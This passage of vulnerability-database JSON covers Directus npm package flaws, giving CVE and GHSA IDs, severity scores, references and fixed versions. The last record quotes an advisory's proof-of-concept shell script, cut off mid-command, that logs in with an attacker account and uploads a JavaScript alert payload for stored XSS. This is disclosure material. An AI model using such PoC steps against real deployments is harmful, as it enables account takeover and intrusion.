t5x-yjzf-4yab"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-v4vz-smcx-gygb"},{"vulnerability":"VCID-wgag-36wa-qyay"},{"vulnerability":"VCID-wn2j-dtpz-hye1"},{"vulnerability":"VCID-xt9c-32g5-mqes"},{"vulnerability":"VCID-xtcw-1jv1-s7ax"},{"vulnerability":"VCID-y1vf-15p4-rfca"},{"vulnerability":"VCID-yutw-33sk-5fg3"},{"vulnerability":"VCID-yz34-qwam-wbcn"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.7.0"}],"aliases":["CVE-2022-24814","GHSA-xmjj-3c76-5w84"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-p7d9-91j7-dbab"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/330195?format=json","vulnerability_id":"VCID-prpm-x77m-cuha","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35441","reference_id":"","reference_type":"","scores":[{"value":"0.00015","scoring_system":"epss","scoring_elements":"0.03141","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35441"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-ph52-67fq-75wj","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-07T14:47:06Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-ph52-67fq-75wj"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35441","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35441"},{"reference_url":"https://github.com/advisories/GHSA-ph52-67fq-75wj","reference_id":"GHSA-ph52-67fq-75wj","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-ph52-67fq-75wj"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/188807?format=json","purl":"pkg:npm/directus@11.17.0","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.17.0"}],"aliases":["CVE-2026-35441","GHSA-ph52-67fq-75wj"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-prpm-x77m-cuha"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/306032?format=json","vulnerability_id":"VCID-pwt9-krmn-7kdd","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-53889","reference_id":"","reference_type":"","scores":[{"value":"0.00244","scoring_system":"epss","scoring_elements":"0.47882","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-53889"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/commit/22be460c76957708d67fdd52846a9ad1cbb083fb","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:43:29Z/"}],"url":"https://github.com/directus/directus/commit/22be460c76957708d67fdd52846a9ad1cbb083fb"},{"reference_url":"https://github.com/directus/directus/releases/tag/v11.9.0","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:43:29Z/"}],"url":"https://github.com/directus/directus/releases/tag/v11.9.0"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-7cvf-pxgp-42fc","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:43:29Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-7cvf-pxgp-42fc"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-53889","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-53889"},{"reference_url":"https://github.com/advisories/GHSA-7cvf-pxgp-42fc","reference_id":"GHSA-7cvf-pxgp-42fc","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-7cvf-pxgp-42fc"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/195594?format=json","purl":"pkg:npm/directus@11.9.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3kmj-b584-9ubg"},{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-5u8r-s8tz-guhm"},{"vulnerability":"VCID-7zt3-dcnm-hqfb"},{"vulnerability":"VCID-anfb-6kfn-a7h7"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-gwwu-p9jt-eke3"},{"vulnerability":"VCID-hed8-anm5-ukc9"},{"vulnerability":"VCID-jjth-fmsp-rfcj"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-na3v-me78-aqcg"},{"vulnerability":"VCID-nvha-b5tb-dqdt"},{"vulnerability":"VCID-p1m5-v3rs-wbh7"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-tt5x-yjzf-4yab"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-xtcw-1jv1-s7ax"},{"vulnerability":"VCID-y1vf-15p4-rfca"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.9.0"}],"aliases":["CVE-2025-53889","GHSA-7cvf-pxgp-42fc"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-pwt9-krmn-7kdd"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/17005?format=json","vulnerability_id":"VCID-szny-2sbf-v7de","summary":"Directus is a real-time API and App dashboard for managing SQL database content. Directus is vulnerable to Server-Side Request Forgery (SSRF) when importing a file from a remote web server (POST to `/files/import`). An attacker can bypass the security controls by performing a DNS rebinding attack and view sensitive data from internal servers or perform a local port scan. An attacker can exploit this vulnerability to access highly sensitive internal server(s) and steal sensitive information. This issue was fixed in version 9.23.0.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-26492","reference_id":"","reference_type":"","scores":[{"value":"0.0023","scoring_system":"epss","scoring_elements":"0.45796","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-26492"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/commit/ff53d3e69a602d05342e15d9bb616884833ddbff","reference_id":"","reference_type":"","scores":[{"value":"5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-25T14:30:38Z/"}],"url":"https://github.com/directus/directus/commit/ff53d3e69a602d05342e15d9bb616884833ddbff"},{"reference_url":"https://github.com/directus/directus/releases/tag/v9.23.0","reference_id":"","reference_type":"","scores":[{"value":"5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-25T14:30:38Z/"}],"url":"https://github.com/directus/directus/releases/tag/v9.23.0"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-26492","reference_id":"CVE-2023-26492","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-26492"},{"reference_url":"https://github.com/advisories/GHSA-j3rg-3rgm-537h","reference_id":"GHSA-j3rg-3rgm-537h","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-j3rg-3rgm-537h"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-j3rg-3rgm-537h","reference_id":"GHSA-j3rg-3rgm-537h","reference_type":"","scores":[{"value":"5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-25T14:30:38Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-j3rg-3rgm-537h"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/63067?format=json","purl":"pkg:npm/directus@9.23.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-jmem-8d4q-x7br"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.23.0"},{"url":"http://public2.vulnerablecode.io/api/packages/62977?format=json","purl":"pkg:npm/directus@9.23.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3cgw-zr3k-3fen"},{"vulnerability":"VCID-3kmj-b584-9ubg"},{"vulnerability":"VCID-4wtt-tffj-bbeb"},{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-7mea-hn69-wuhu"},{"vulnerability":"VCID-7zt3-dcnm-hqfb"},{"vulnerability":"VCID-8r4e-a1vf-9bd9"},{"vulnerability":"VCID-anfb-6kfn-a7h7"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-bh2g-b9dd-d3d9"},{"vulnerability":"VCID-eb8p-vqjt-yfb8"},{"vulnerability":"VCID-ejme-tqn4-byhk"},{"vulnerability":"VCID-eygf-cb4y-hqd3"},{"vulnerability":"VCID-g34r-4mb9-afab"},{"vulnerability":"VCID-gjju-tu4e-gqfc"},{"vulnerability":"VCID-gwwu-p9jt-eke3"},{"vulnerability":"VCID-hed8-anm5-ukc9"},{"vulnerability":"VCID-hhwc-1jxe-7yaw"},{"vulnerability":"VCID-hpbn-rr29-2yck"},{"vulnerability":"VCID-hrqc-8err-4fbx"},{"vulnerability":"VCID-jjth-fmsp-rfcj"},{"vulnerability":"VCID-jmem-8d4q-x7br"},{"vulnerability":"VCID-kqs7-8txh-jyc8"},{"vulnerability":"VCID-m3wb-sstx-v3d6"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-msb5-197k-a3er"},{"vulnerability":"VCID-na3v-me78-aqcg"},{"vulnerability":"VCID-nvha-b5tb-dqdt"},{"vulnerability":"VCID-p1m5-v3rs-wbh7"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-pwt9-krmn-7kdd"},{"vulnerability":"VCID-tt5x-yjzf-4yab"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-wgag-36wa-qyay"},{"vulnerability":"VCID-wn2j-dtpz-hye1"},{"vulnerability":"VCID-xc7t-gwaz-ckeu"},{"vulnerability":"VCID-xt9c-32g5-mqes"},{"vulnerability":"VCID-xtcw-1jv1-s7ax"},{"vulnerability":"VCID-y1vf-15p4-rfca"},{"vulnerability":"VCID-yutw-33sk-5fg3"},{"vulnerability":"VCID-yz34-qwam-wbcn"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.23.1"}],"aliases":["CVE-2023-26492","GHSA-j3rg-3rgm-537h"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-szny-2sbf-v7de"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/330171?format=json","vulnerability_id":"VCID-tt5x-yjzf-4yab","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35411","reference_id":"","reference_type":"","scores":[{"value":"0.00019","scoring_system":"epss","scoring_elements":"0.05471","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35411"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-q75c-4gmv-mg9x","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-07T13:36:55Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-q75c-4gmv-mg9x"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35411","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35411"},{"reference_url":"https://github.com/advisories/GHSA-q75c-4gmv-mg9x","reference_id":"GHSA-q75c-4gmv-mg9x","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-q75c-4gmv-mg9x"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/188455?format=json","purl":"pkg:npm/directus@11.16.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-y1vf-15p4-rfca"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.16.1"}],"aliases":["CVE-2026-35411","GHSA-q75c-4gmv-mg9x"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-tt5x-yjzf-4yab"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/330981?format=json","vulnerability_id":"VCID-ukzv-q5tj-4faq","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-39943","reference_id":"","reference_type":"","scores":[{"value":"0.00032","scoring_system":"epss","scoring_elements":"0.09767","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-39943"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/releases/tag/v11.17.0","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T14:06:00Z/"}],"url":"https://github.com/directus/directus/releases/tag/v11.17.0"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-mvv8-v4jj-g47j","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T14:06:00Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-mvv8-v4jj-g47j"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-39943","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-39943"},{"reference_url":"https://github.com/advisories/GHSA-mvv8-v4jj-g47j","reference_id":"GHSA-mvv8-v4jj-g47j","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-mvv8-v4jj-g47j"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/188807?format=json","purl":"pkg:npm/directus@11.17.0","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.17.0"}],"aliases":["CVE-2026-39943","GHSA-mvv8-v4jj-g47j"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ukzv-q5tj-4faq"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/17045?format=json","vulnerability_id":"VCID-v4vz-smcx-gygb","summary":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')\nDirectus is a real-time API and App dashboard for managing SQL database content. Instances relying on an allow-listed reset URL is vulnerable to an HTML injection attack through the use of query parameters in the reset URL. An attacker could exploit this to email users urls to the servers domain but which may contain malicious code. The problem has been resolved and released under version 9.23.0. People relying on a custom password reset URL should upgrade to 9.23.0 or later, or remove the custom reset url from the configured allow list. Users are advised to upgrade. Users unable to upgrade may disable the custom reset URL allow list as a workaround.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-27474","reference_id":"","reference_type":"","scores":[{"value":"0.00828","scoring_system":"epss","scoring_elements":"0.74823","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-27474"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/issues/17119","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"},{"value":"8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:29:56Z/"}],"url":"https://github.com/directus/directus/issues/17119"},{"reference_url":"https://github.com/directus/directus/pull/17120","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"},{"value":"8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:29:56Z/"}],"url":"https://github.com/directus/directus/pull/17120"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-27474","reference_id":"CVE-2023-27474","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-27474"},{"reference_url":"https://github.com/advisories/GHSA-4hmq-ggrm-qfc6","reference_id":"GHSA-4hmq-ggrm-qfc6","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-4hmq-ggrm-qfc6"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-4hmq-ggrm-qfc6","reference_id":"GHSA-4hmq-ggrm-qfc6","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"},{"value":"8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:29:56Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-4hmq-ggrm-qfc6"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/63067?format=json","purl":"pkg:npm/directus@9.23.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-jmem-8d4q-x7br"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.23.0"},{"url":"http://public2.vulnerablecode.io/api/packages/62977?format=json","purl":"pkg:npm/directus@9.23.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3cgw-zr3k-3fen"},{"vulnerability":"VCID-3kmj-b584-9ubg"},{"vulnerability":"VCID-4wtt-tffj-bbeb"},{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-7mea-hn69-wuhu"},{"vulnerability":"VCID-7zt3-dcnm-hqfb"},{"vulnerability":"VCID-8r4e-a1vf-9bd9"},{"vulnerability":"VCID-anfb-6kfn-a7h7"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-bh2g-b9dd-d3d9"},{"vulnerability":"VCID-eb8p-vqjt-yfb8"},{"vulnerability":"VCID-ejme-tqn4-byhk"},{"vulnerability":"VCID-eygf-cb4y-hqd3"},{"vulnerability":"VCID-g34r-4mb9-afab"},{"vulnerability":"VCID-gjju-tu4e-gqfc"},{"vulnerability":"VCID-gwwu-p9jt-eke3"},{"vulnerability":"VCID-hed8-anm5-ukc9"},{"vulnerability":"VCID-hhwc-1jxe-7yaw"},{"vulnerability":"VCID-hpbn-rr29-2yck"},{"vulnerability":"VCID-hrqc-8err-4fbx"},{"vulnerability":"VCID-jjth-fmsp-rfcj"},{"vulnerability":"VCID-jmem-8d4q-x7br"},{"vulnerability":"VCID-kqs7-8txh-jyc8"},{"vulnerability":"VCID-m3wb-sstx-v3d6"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-msb5-197k-a3er"},{"vulnerability":"VCID-na3v-me78-aqcg"},{"vulnerability":"VCID-nvha-b5tb-dqdt"},{"vulnerability":"VCID-p1m5-v3rs-wbh7"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-pwt9-krmn-7kdd"},{"vulnerability":"VCID-tt5x-yjzf-4yab"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-wgag-36wa-qyay"},{"vulnerability":"VCID-wn2j-dtpz-hye1"},{"vulnerability":"VCID-xc7t-gwaz-ckeu"},{"vulnerability":"VCID-xt9c-32g5-mqes"},{"vulnerability":"VCID-xtcw-1jv1-s7ax"},{"vulnerability":"VCID-y1vf-15p4-rfca"},{"vulnerability":"VCID-yutw-33sk-5fg3"},{"vulnerability":"VCID-yz34-qwam-wbcn"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.23.1"}],"aliases":["CVE-2023-27474","GHSA-4hmq-ggrm-qfc6"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-v4vz-smcx-gygb"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/347350?format=json","vulnerability_id":"VCID-wgag-36wa-qyay","summary":"Directus has a DOM-Based cross-site scripting (XSS) via layout_options\n### Impact\nDirectus allows an authenticated attacker to save cross site scripting code to the database. This is possible because the application injects an attacker-controlled parameter that will be stored in the server and used by the client into an unsanitized DOM element. When chained with [CVE-2024-6534](https://github.com/directus/directus/security/advisories/GHSA-3fff-gqw3-vj86), it could result in account takeover.\n\n### PoC\nTo exploit this vulnerability, we need to do the following steps using a non-administrative, default role attacker account.\n\n1. Upload the following JavaScript file.\n\nUsing the upload functionality at `POST /files`. This PoC will show an alert message.\n\n```js\nexport TARGET_HOST=\"http://localhost:8055\"\nexport ATTACKER_EMAIL=\"malicious@malicious.com\"\nexport ATTACKER_PASSWORD=\"123456\"\nroot_dir=$(dirname $0)\nmkdir \"${root_dir}/static\"\n\ncurl -s -k -o /dev/null -w \"%{http_code}\" -X 'POST' \"${TARGET_HOST}/auth/login\" \\\n    -c \"${root_dir}/static/attacker_directus_session_token\" \\\n    -H 'Content-Type: application/json' \\\n    -d \"{\\\"email\\\":\\\"${ATTACKER_EMAIL}\\\",\\\"password\\\":\\\"${ATTACKER_PASSWORD}\\\",\\\"mode\\\":\\\"session\\\"}\"\n\nid_url_file=$(echo \"alert('Successful DOM-based XSS')\" |\n  curl -s -k -X 'POST' \"${TARGET_HOST}/files\" \\\n    -b \"${root_dir}/static/attacker_directus_session_token\" \\\n    -F 